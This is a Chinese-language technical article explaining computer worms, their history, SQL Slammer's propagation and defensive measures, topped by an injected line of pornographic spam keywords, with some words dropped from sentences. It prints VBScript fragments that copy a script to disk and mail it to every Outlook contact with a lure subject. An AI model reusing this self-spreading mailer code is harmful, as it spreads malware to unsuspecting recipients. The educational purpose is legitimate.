色婷婷AⅤ一区二区三区|亚洲精品第一国产综合亚AV|久久精品官方网视频|日本28视频香蕉

          新聞中心

          EEPW首頁 > 手機與無線通信 > 設計應用 > 深入解析并防范電腦蠕蟲病毒!

          深入解析并防范電腦蠕蟲病毒!

          作者: 時間:2017-06-13 來源:網絡 收藏

          凡能夠引起計算機故障,破壞計算機數據的程序統(tǒng)稱為計算機。所以從這個意義上說,也是一種!,作為對互聯網危害嚴重的 一種計算機程序,其破壞力和傳染性不容忽視。與傳統(tǒng)的病毒不同,病毒以計算機為載體,以為攻擊對象!本文中將蠕蟲病毒分為針對企業(yè)和個人用戶2類,并從企業(yè)用戶和個人用戶兩個方面探討蠕蟲病毒的特征和一些防范措施!

          本文引用地址:http://cafeforensic.com/article/201706/357333.htm

          本文根據蠕蟲病毒的發(fā)作機制,將其分為利用系統(tǒng)級別漏洞(主動傳播)和利用社會工程學(欺騙傳播)兩種,并從用戶角度中將蠕蟲病毒分為針對企業(yè)網絡和個人用戶2類,從企業(yè)用戶和個人用戶兩個方面探討蠕蟲病毒的特征和一些防范措施!

          一、蠕蟲病毒的定義

          1.蠕蟲病毒的定義

          計算機病毒自出現之日起,就成為計算機的一個巨大威脅,而當網絡迅速發(fā)展的時候,蠕蟲病毒引起的危害開始顯現!從廣義上定義,凡能夠引起計算機故障,破壞計算機數據的程序統(tǒng)稱為計算機病毒。所以從這個意義上說,蠕蟲也是一種病毒!但是蠕蟲病毒和一般的病毒有著很大的區(qū)別。對于蠕蟲,現在還沒有一個成套的理論體系,一般認為,蠕蟲是一種通過網絡傳播的惡性病毒,它具有病毒的一些共性,如傳播性,隱蔽性,破壞性等等,同時具有自己的一些特征,如不利用文件寄生(有的只存在于內存中),對網絡造成拒絕服務,以及和黑客技術相結合等等!在產生的破壞性上,蠕蟲病毒也不是普通病毒所能比擬的,網絡的發(fā)展使得蠕蟲可以在短短的時間內蔓延整個網絡,造成網絡癱瘓!

          根據使用者情況可將蠕蟲病毒分為2類,一種是面向企業(yè)用戶和局域網而言,這種病毒利用系統(tǒng)漏洞,主動進行攻擊,可以對整個互聯網可造成癱瘓性的后果!以“紅色代碼”,“尼姆達”,以及最新的“sql蠕蟲王”為代表。另外一種是針對個人用戶的,通過網絡(主要是電子郵件,惡意網頁形式)迅速傳播的蠕蟲病毒,以愛蟲病毒,求職信病毒為例.在這兩類中,第一類具有很大的主動攻擊性,而且爆發(fā)也有一定的突然性,但相對來說,查殺這種病毒并不是很難。第二種病毒的傳播方式比較復雜和多樣,少數利用了微軟的應用程序的漏洞,更多的是利用社會工程學()對用戶進行欺騙和誘使,這樣的病毒造成的損失是非常大的,同時也是很難根除的,比如求職信病毒,在2001年就已經被各大殺毒廠商發(fā)現,但直到2002年底依然排在病毒危害排行榜的首位就是證明!出得在接下來的內容中,將分別分析這兩種病毒的一些特征及防范措施!

          2.蠕蟲病毒與一般病毒的異同

          蠕蟲也是一種病毒,因此具有病毒的共同特征。一般的病毒是需要的寄生的,它可以通過自己指令的執(zhí)行,將自己的指令代碼寫到其他程序的體內,而被感染的文件就被稱為”宿主”,例如,windows下可執(zhí)行文件的格式為pe格式(Portable Executable),當需要感染pe文件時,在宿主程序中,建立一個新節(jié),將病毒代碼寫到新節(jié)中,修改的程序入口點等,這樣,宿主程序執(zhí)行的時候,就可以先執(zhí)行病毒程序,病毒程序運行完之后,在把控制權交給宿主原來的程序指令??梢?,病毒主要是感染文件,當然也還有像DIRII這種鏈接型病毒,還有引導區(qū)病毒。引導區(qū)病毒他是感染磁盤的引導區(qū),如果是軟盤被感染,這張軟盤用在其他機器上后,同樣也會感染其他機器,所以傳播方式也是用軟盤等方式。

          蠕蟲一般不采取利用pe格式插入文件的方法,而是復制自身在互聯網環(huán)境下進行傳播,病毒的傳染能力主要是針對計算機內的文件系統(tǒng)而言,而蠕蟲病毒的傳染目標是互聯網內的所有計算機.局域網條件下的共享文件夾,電子郵件email,網絡中的惡意網頁,大量存在著漏洞的服務器等都成為蠕蟲傳播的良好途徑。網絡的發(fā)展也使得蠕蟲病毒可以在幾個小時內蔓延全球!而且蠕蟲的主動攻擊性和突然爆發(fā)性將使得人們手足無策!

                 普通病毒     蠕蟲病毒 

          存在形式 寄存文件 獨立程序

          傳染機制 宿主程序運行 主動攻擊

          傳染目標 本地文件 網絡計算機

          可以預見,未來能夠給網絡帶來重大災難的主要必定是網絡蠕蟲!

          3.蠕蟲的破壞和發(fā)展趨勢

          1988年一個由美國CORNELL大學研究生莫里斯編寫的蠕蟲病毒蔓延造成了數千臺計算機停機,蠕蟲病毒開始現身網絡;而后來的紅色代碼,尼姆達病毒瘋狂的時候,造成幾十億美元的損失;北京時間2003年1月26日, 一種名為“2003蠕蟲王”的電腦病毒迅速傳播并襲擊了全球,致使互聯網網路嚴重堵塞,作為互聯網主要基礎的域名服務器(DNS)的癱瘓造成網民瀏覽互聯網網頁及收發(fā)電子郵件的速度大幅減緩,同時銀行自動提款機的運作中斷, 機票等網絡預訂系統(tǒng)的運作中斷,信用卡等收付款系統(tǒng)出現故障!專家估計,此病毒造成的直接經濟損失至少在12億美元以上!

          病毒名稱   持續(xù)時間   造成損失莫里斯蠕蟲 1988年

          6000多臺計算機停機,直接經濟損失達9600萬美元! 美麗殺手

          1999年 政府部門和一些大公司緊急關閉了網絡服務器,

          經濟損失超過12億美元!愛蟲病毒

          2000年5月至今

          眾多用戶電腦被感染,損失超過100億美元以上 紅色代碼

          2001年7月 網絡癱瘓,直接經濟損失超過26億美元 求職信

          2001年12月至今 大量病毒郵件堵塞服務器,損失達數百億美元 蠕蟲王

          2003年1月 網絡大面積癱瘓,銀行自動提款機運做中斷,直接經濟損失超過26億美元

          由表可以知道,蠕蟲病毒對網絡產生堵塞作用,并造成了巨大的經濟損失!

          通過對以上蠕蟲病毒的分析,可以知道,蠕蟲發(fā)作的一些特點和發(fā)展趨勢:

          1.利用操作系統(tǒng)和應用程序的漏洞主動進行攻擊.. 此類病毒主要是“紅色代碼”和“尼姆達”,以及至今依然肆虐的”求職信”等.由于IE瀏覽器的漏洞(Iframe Execcomand),使得感染了“尼姆達”病毒的郵件在不去手工打開附件的情況下病毒就能激活,而此前即便是很多防病毒專家也一直認為,帶有病毒附件的郵件,只要不去打開附件,病毒不會有危害。“紅色代碼”是利用了微軟IIS服務器軟件的漏洞(idq.dll遠程緩存區(qū)溢出)來傳播。Sql蠕蟲王病毒則是利用了微軟的數據庫系統(tǒng)的一個漏洞進行大肆攻擊!

          2.傳播方式多樣 如“尼姆達”病毒和”求職信”病毒,可利用的傳播途徑包括文件、電子郵件、Web服務器、網絡共享等等。

          3.病毒制作技術與傳統(tǒng)的病毒不同的是,許多新病毒是利用當前最新的編程語言與編程技術實現的,易于修改以產生新的變種,從而逃避反病毒軟件的搜索。另外,新病毒利用Java、ActiveX、VB Script等技術,可以潛伏在HTML頁面里,在上網瀏覽時觸發(fā)。

          4.與黑客技術相結合! 潛在的威脅和損失更大!以紅色代碼為例,感染后的機器的web目錄的scripts下將生成一個root.exe,可以遠程執(zhí)行任何命令,從而使黑客能夠再次進入!二、網絡蠕蟲病毒分析和防范

          蠕蟲和普通病毒不同的一個特征是蠕蟲病毒往往能夠利用漏洞,這里的漏洞或者說是缺陷,我們分為2種,軟件上的缺陷和人為上的缺陷。軟件上的缺陷,如遠程溢出,微軟ie和outlook的自動執(zhí)行漏洞等等,需要軟件廠商和用戶共同配合,不斷的升級軟件。而人為的缺陷,主要是指的是計算機用戶的疏忽。這就是所謂的社會工程學(social engineering),當收到一封郵件帶著病毒的求職信郵件時候,大多數人都會報著好奇去點擊的。對于企業(yè)用戶來說,威脅主要集中在服務器和大型應用軟件的安全上,而個人用戶而言,主要是防范第二種缺陷。

          1.利用系統(tǒng)漏洞的惡性蠕蟲病毒分析

          在這種病毒中,以紅色代碼,尼姆達和sql蠕蟲為代表!他們共同的特征是利用微軟服務器和應用程序組件的某個漏洞進行攻擊,由于網上存在這樣的漏洞比較普遍,使得病毒很容易的傳播!而且攻擊的對象大都為服務器,所以造成的網絡堵塞現象嚴重!

          以2003年1月26號爆發(fā)的sql蠕蟲為例,爆發(fā)數小時內席卷了全球網絡,造成網絡大塞車.亞洲國家中以人口上網普及率達七成的韓國所受影響較為嚴重。韓國兩大網絡業(yè)KFT及***電訊公司,系統(tǒng)都陷入了癱瘓,其它的網絡用戶也被迫斷線,更為嚴重的是許多銀行的自動取款機都無法正常工作, 美國許美國銀行統(tǒng)計,該行的13000臺自動柜員機已經無法提供正常提款。網絡蠕蟲病毒開始對人們的生活產生了巨大的影響!

          這次sql蠕蟲攻擊的是微軟數據庫系Microsoft SQL Server 2000的,利用了MSSQL2000服務遠程堆棧緩沖區(qū)溢出漏洞, Microsoft SQL Server 2000是一款由Microsoft公司開發(fā)的商業(yè)性質大型數據庫系統(tǒng)。SQL Server監(jiān)聽UDP的1434端口,客戶端可以通過發(fā)送消息到這個端口來查詢目前可用的連接方式(連接方式可以是命名管道也可以是TCP),但是此程序存在嚴重漏洞,當客戶端發(fā)送超長數據包時,將導致緩沖區(qū)溢出,黑客可以利用該漏洞在遠程機器上執(zhí)行自己的惡意代碼。

          微軟在200年7月份的時候就為這個漏洞發(fā)布了一個安全公告,但當sql蠕蟲爆發(fā)的時候,依然有大量的裝有ms sqlserver 2000的服務器沒有安裝最新的補丁,從而被蠕蟲病毒所利用,蠕蟲病毒通過一段376個字節(jié)的惡意代碼,遠程獲得對方主機的系統(tǒng)控制權限, 取得三個Win32 API地址,GetTickCount、socket、sendto,接著病毒使用GetTickCount獲得一個隨機數,進入一個死循環(huán)繼續(xù)傳播。在該循環(huán)中蠕蟲使用獲得的隨機數生成一個隨機的ip地址,然后將自身代碼發(fā)送至1434端口(Microsoft SQL Server開放端口),該蠕蟲傳播速度極快,其使用廣播數據包方式發(fā)送自身代碼,每次均攻擊子網中所有255臺可能存在機器。由于這是一個死循環(huán)的過程,發(fā)包密度僅和機器性能和網絡帶寬有關,所以發(fā)送的數據量非常大。該蠕蟲對被感染機器本身并沒有進行任何惡意破壞行為,也沒有向硬盤上寫文件,僅僅存在與內存中。對于感染的系統(tǒng),重新啟動后就可以清除蠕蟲,但是仍然會重復感染。由于發(fā)送數據包占用了大量系統(tǒng)資源和網絡帶寬,形成Udp Flood,感染了該蠕蟲的網絡性能會極度下降。一個百兆網絡內只要有一兩臺機器感染該蠕蟲就會導致整個網絡訪問阻塞。

          通過以上分析可以知道,此蠕蟲病毒本身除了對網絡產生拒絕服務攻擊外,并沒有別的破壞措施.但如果病毒編寫者在編寫病毒的時候加入破壞代碼,后果將不堪設想!

          2.企業(yè)防范蠕蟲病毒措施

          此次sql蠕蟲病毒,利用的漏洞在2002年7月份微軟的一份安全公告中就有詳細說明!而且微軟也提供了安全補丁提供下載,然而在時隔半年之后互聯網上還有相當大的一部分服務器沒有安裝最新的補丁,其網絡管理員的安全防范意識可見一斑!

          當前,企業(yè)網絡主要應用于文件和打印服務共享、辦公自動化系統(tǒng)、企業(yè)業(yè)務(MIS)系統(tǒng)、Internet應用等領域。網絡具有便利信息交換特性,蠕蟲病毒也可以充分利用網絡快速傳播達到其阻塞網絡目的。企業(yè)在充分地利用網絡進行業(yè)務處理時,就不得不考慮企業(yè)的病毒防范問題,以保證關系企業(yè)命運的業(yè)務數據完整不被破壞。

          企業(yè)防治蠕蟲病毒的時候需要考慮幾個問題:病毒的查殺能力,病毒的監(jiān)控能力,新病毒的反應能力。而企業(yè)防毒的一個重要方面是是管理和策略。推薦的企業(yè)防范蠕蟲病毒的策略如下:

          (1)加強網絡管理員安全管理水平,提高安全意識。由于蠕蟲病毒利用的是系統(tǒng)漏洞進行攻擊,所以需要在第一時間內保持系統(tǒng)和應用軟件的安全性,保持各種操作系統(tǒng)和應用軟件的更新!由于各種漏洞的出現,使得安全不在是一種一勞永逸的事,而作為企業(yè)用戶而言,所經受攻擊的危險也是越來越大,要求企業(yè)的管理水平和安全意識也越來越高!

          (2)建立病毒檢測系統(tǒng)。能夠在第一時間內檢測到網絡異常和病毒攻擊。

          (3)建立應急響應系統(tǒng),將風險減少到最??!由于蠕蟲病毒爆發(fā)的突然性,可能在病毒發(fā)現的時候已經蔓延到了整個網絡,所以在突發(fā)情況下,建立一個緊急響應系統(tǒng)是很有必要的,在病毒爆發(fā)的第一時間即能提供解決方案。

          (4)建立災難備份系統(tǒng)。對于數據庫和數據系統(tǒng),必須采用定期備份,多機備份措施,防止意外災難下的數據丟失!

          (5)對于局域網而言,可以采用以下一些主要手段:A.在因特網接入口處安裝防火墻式防殺計算機病毒產品,將病毒隔離在局域網之外。B.對郵件服務器進行監(jiān)控,防止帶毒郵件進行傳播!C.對局域網用戶進行安全培訓。D.建立局域網內部的升級系統(tǒng),包括各種操作系統(tǒng)的補丁升級,各種常用的應用軟件升級,各種殺毒軟件病毒庫的升級等等!3.對個人用戶產生直接威脅的蠕蟲病毒

          在以上分析的蠕蟲病毒中,只對安裝了特定的微軟組件的系統(tǒng)進行攻擊,而對廣大個人用戶而言,是不會安裝iis(微軟的因特網服務器程序,可以使允許在網上提供web服務)或者是龐大的數據庫系統(tǒng)的!因此上述病毒并不會直接攻擊個個人用戶的電腦(當然能夠間接的通過網絡產生影響),但接下來分析的蠕蟲病毒,則是對個人用戶威脅最大,同時也是最難以根除,造成的損失也更大的一類蠕蟲病毒!

          對于個人用戶而言,威脅大的蠕蟲病毒采取的傳播方式一般為電子郵件(Email)以及惡意網頁等等!

          對于利用email傳播得蠕蟲病毒來說,通常利用的是社會工程學(Social Engineering),即以各種各樣的欺騙手段那誘惑用戶點擊的方式進行傳播!

          3.惡意網頁

          惡意網頁確切的講是一段黑客破壞代碼程序,它內嵌在網頁中,當用戶在不知情的情況下打開含有病毒的網頁時,病毒就會發(fā)作。這種病毒代碼鑲嵌技術的原理并不復雜,所以會被很多懷不良企圖者利用,在很多黑客網站竟然出現了關于用網頁進行破壞的技術的論壇,并提供破壞程序代碼下載,從而造成了惡意網頁的大面積泛濫,也使越來越多的用戶遭受損失。

          對于惡意網頁,常常采取vb script和java script編程的形式!由于編程方式十分的簡單!所以在網上非常的流行!

          Vb script和java script是由微軟操作系統(tǒng)的wsh(Windows Scripting HostWindows腳本主機)解析并執(zhí)行的,由于其編程非常簡單,所以此類腳本病毒在網上瘋狂傳播,瘋狂一時的愛蟲病毒就是一種vbs腳本病毒,然后偽裝成郵件附件誘惑用戶點擊運行,更為可怕的是,這樣的病毒是以源代碼的形式出現的,只要懂得一點關于腳本編程的人就可以修改其代碼,形成各種各樣的變種。

          下面以一個簡單的腳本為例:

          Set objFs=CreateObject (“Scripting.FileSystemObject”)

          (創(chuàng)建一個文件系統(tǒng)對象)objFs.CreateTextFile (C:virus.txt, 1)

          (通過文件系統(tǒng)對象的方法創(chuàng)建了TXT文件)

          如果我們把這兩句話保存成為.vbs的VB腳本文件,點擊就會在C盤中創(chuàng)建一個TXT文件了。倘若我們把第二句改為:

          objFs.GetFile (WScript.ScriptFullName).Copy (C:virus.vbs)

          就可以將自身復制到C盤virus.vbs這個文件。本句前面是打開這個腳本文件,WScript.ScriptFullName指明是這個程序本身,是一個完整的路徑文件名。GetFile函數獲得這個文件,Copy函數將這個文件復制到C盤根目錄下virus.vbs這個文件。這么簡單的兩句就實現了自我復制的功能,已經具備病毒的基本特征——自我復制能力。

          此類病毒往往是通過郵件傳播的,在vb script中調用郵件發(fā)送功能也非常的簡單,病毒往往采用的方法是向outlook中的地址薄中的郵件地址發(fā)送帶有包含自身的郵件來達到傳播目的,一個簡單的實例如下:

          Set objOA=Wscript.CreateObject (Outlook.Application)
          (創(chuàng)建一個OUTLOOK應用的對象)Set objMapi=objOA.GetNameSpace (MAPI)

          (取得MAPI名字空間)For i=1 to objMapi.AddressLists.Count(遍歷地址簿)

          Set objAddList=objMapi.AddressLists (i)

          For j=1 To objAddList. AddressEntries.Count Set

          objMail=objOA.CreateItem (0) objMail.Recipients.Add

          (objAddList. AddressEntries

          (j))

          (取得收件人郵件地址 )objMail.Subject=你好!

          (設置郵件主題,這個往往具有很大的誘惑性質)

          objMail.Body=這次給你的附件,是我的新文檔!

          (設置信件內容)objMail.Attachments.Add (“c:virus.vbs)

          (把自己作為附件擴散出去 )objMail.Send(發(fā)送郵件)

          NextNext Set objMapi=Nothing(清空objMapi變量,釋放資源)

          set objOA=Nothing(清空objOA變量)

          這一小段代碼的功能是向地址簿中的用戶發(fā)送電子郵件,并將自己作為附件擴散出去。這段代碼中的第一行是創(chuàng)建一個Outlook的對象,是必不可少的。在其下是一個循環(huán),在循環(huán)中不斷地向地址簿中的電子郵件地址發(fā)送內容相同的信件。這就是蠕蟲的傳播性。

          由此可以看出,利用vb script編寫病毒是非常容易的,這就使得此類病毒的變種繁多,破壞力極大,同時也是非常難以根除的!

          4.個人用戶對蠕蟲病毒的防范措施

          通過上述的分析,我們可以知道,病毒并不是非??膳碌?,網絡蠕蟲病毒對個人用戶的攻擊主要還是通過社會工程學,而不是利用系統(tǒng)漏洞!所以防范此類病毒需要注意以下幾點:

          (1)購合適的殺毒軟件!網絡蠕蟲病毒的發(fā)展已經使傳統(tǒng)的殺毒軟件的“文件級實時監(jiān)控系統(tǒng)”落伍,殺毒軟件必須向內存實時監(jiān)控和郵件實時監(jiān)控發(fā)展!另外面對防不勝防的網頁病毒,也使得用戶對殺毒軟件的要求越來越高!在殺毒軟件市場上,賽門鐵克公司的norton系列殺毒軟件在全球具有很大的比例!經過多項測試,norton殺毒系列軟件腳本和蠕蟲阻攔技術能夠阻擋大部分電子郵件病毒,而且對網頁病毒也有相當強的防范能力!目前國內的殺毒軟件也具有了相當高的水平。像瑞星,kv系列等殺毒軟件,在殺毒軟件的同時整合了防火強功能,從而對蠕蟲兼木馬程序有很大克制作用。

          (2)經常升級病毒庫,殺毒軟件對病毒的查殺是以病毒的特征碼為依據的,而病毒每天都層出不窮,尤其是在網絡時代,蠕蟲病毒的傳播速度快,變種多,所以必須隨時更新病毒庫,以便能夠查殺最新的病毒!

          (3)提高防殺毒意識.不要輕易去點擊陌生的站點,有可能里面就含有惡意代碼!

          當運行IE時,點擊“工具→Internet選項→安全→ Internet區(qū)域的安全級別”,把安全級別由“中”改為“高” 。因為這一類網頁主要是含有惡意代碼的ActiveX或Applet、 JavaScript的網頁文件 ,所以在IE設置中將ActiveX插件和控件、Java腳本等全部禁止就可以大大減少被網頁惡意代碼感染的幾率。具體方案是:在IE窗口中點擊“工具”→“Internet選項”,在彈出的對話框中選擇“安全”標簽,再點擊“自定義級別”按鈕,就會彈出“安全設置”對話框,把其中所有ActiveX插件和控件以及與Java相關全部選項選擇“禁用”。但是,這樣做在以后的網頁瀏覽過程中有可能會使一些正常應用ActiveX的網站無法瀏覽。

          (4)不隨意查看陌生郵件,尤其是帶有附件的郵件,由于有的病毒郵件能夠利用ie和outlook的漏洞自動執(zhí)行,所以計算機用戶需要升級ie和outlook程序,及常用的其他應用程序!

          三、小結

          網絡蠕蟲病毒作為一種互聯網高速發(fā)展下的一種新型病毒,必將對網絡產生巨大的危險。在防御上,已經不再是由單獨的殺毒廠商所能夠解決,而需要網絡安全公司,系統(tǒng)廠商,防病毒廠商及用戶共同參與,構筑全方位的防范體系!

          蠕蟲和黑客技術的結合,使得對蠕蟲的分析,檢測和防范具有一定的難度,同時對蠕蟲的網絡傳播性,網絡流量特性建立數學模型也是有待研究的工作!



          關鍵詞: 病毒 蠕蟲 網絡

          評論


          相關推薦

          技術專區(qū)

          關閉